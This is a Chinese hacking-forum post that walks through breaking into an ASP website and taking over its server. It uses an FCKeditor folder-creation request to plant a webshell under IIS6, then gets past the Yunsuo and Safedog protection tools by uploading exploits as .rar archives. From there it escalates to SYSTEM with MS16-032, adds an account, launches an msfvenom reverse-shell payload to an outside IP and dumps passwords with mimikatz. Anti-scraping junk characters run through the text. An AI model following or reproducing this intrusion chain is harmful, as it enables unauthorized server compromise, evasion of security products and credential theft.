找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 从getwebshell到绕过安全狗云锁提权再到利用matasploit ...
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2134|回复: 1
打印 上一主题 下一主题

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:31:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

$ I1 |. h& [: Q. G! h1 ?( c* \6 x2 ~

9 }2 {- D: x* {; ^% J, J" _8 A6 s" M6 F) o) u4 d( I: j7 k9 R& M3 D# {, z0 R- d ]: k8 d3 x# [: o! J. T1 r, w( D0 P! Y W5 i+ }( |8 p7 Y( C' Z1 l0 Q
, B) b( M/ F H) @' o1 F

' O5 b8 h5 C4 p* B3 V7 s+ G# C# x
) r, _6 ^ t7 M" J$ L, B 一、 利用getwebshell
- t0 G2 _0 u) ^8 o0 e
" Z1 b; ^8 Q8 p) F8 H; b首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
5 t" i; y3 q/ X3 E1 y& u
3 k! u# `. e' N0 S+ | 222.png
1 ^) v: }* M4 W1 R) E下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
% C1 V7 y- B' W3 e% C! e/ `% ] 333.png
# o$ F% S. ^, l6 r4 N- ~3 _8 q1 N 下面我们构造一个asp目录,如: ! l1 }& P% h- V. z6 G5 ~

/ s1 D2 j" T* z+ L' U) [8 l9 b

) t+ p5 }/ l7 l: q+ q http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 ! b8 i* M( y+ `3 p) G- ?, e/ c

% n$ q" H- _; n7 W/ q) L7 {# o

4 S3 \, K9 a$ U8 B2 g. a7 p. W 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
7 j. N" N' V. x$ N: R6 t
, z. Z$ x- ?1 m( t* i _5 F$ V 一、 绕过安全狗云锁提权并且加账号
! r) g- n9 G; U7 ]6 S 444.png
6 t% A3 ?. X) {3 F( { 没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
; Q- S* W) ?6 _3 y+ t, m7 z& Y1 x
: G [, c9 @" p/ e u/ T" G$ [% W% y如图:
4 `9 Q, a/ @4 S# i, e6 v 555.png
2 P. B8 U% k# }然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
. Q+ t( T4 n" j
- B2 _# M- }6 P% @% n( N一、 利用metasploit
* L J4 t% \ B: o, i
( c. [/ I K9 @6 v, q6 M( R 首先用pentestbox生成一个64位的payload如下命令
' X; f1 N+ n* g! l9 q- A
2 l& @ v! i$ \ v% E" q. nmsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
1 V- U& ^& @, `! b9 x
; V, q" }- ]3 W, c. _! {为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
4 x q4 A/ S. q5 o( A) B 11.png
, a7 R% ^1 t/ l- c& W! I' j下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
+ j2 C* [- k- |6 {7 X9 A& S' U/ d 13.png
7 u+ h! G \0 c3 Q2 K G/ ^ 下面我们来做一个监听如下命令:
5 `- p$ X: O# a: u j4 k7 _
6 ?9 I2 v. x5 [& R: X7 h9 cportfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
- i) `5 k$ K9 U% A9 q' j' z- _18.png # [: @- R# g9 A1 w' t! z4 _

6 F& y O- g' R \7 b3 u+ }
' K, B$ p }- ]

( O& _8 i8 e/ k3 }

8 l* _6 V4 q9 K. o. c1 y0 S6 ~
3 c* j$ |( ?2 w. R1 N* u S
( k: n: j; q* ]8 n - _2 n) _0 x- a/ G: H. E

, X. Z) C8 y) X1 E n5 G/ n( y
; W) F/ [9 ]$ _/ p- S ! X8 g7 I) g6 Q/ \& e

1 S d8 \3 q1 H6 L+ m* Q8 o
6 M* ^& Y0 g, A1 G+ F

回复

使用道具 举报

沙发
匿名  发表于 2021-11-20 23:30:06
图片怎么都没了
回复 支持 反对

使用道具

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表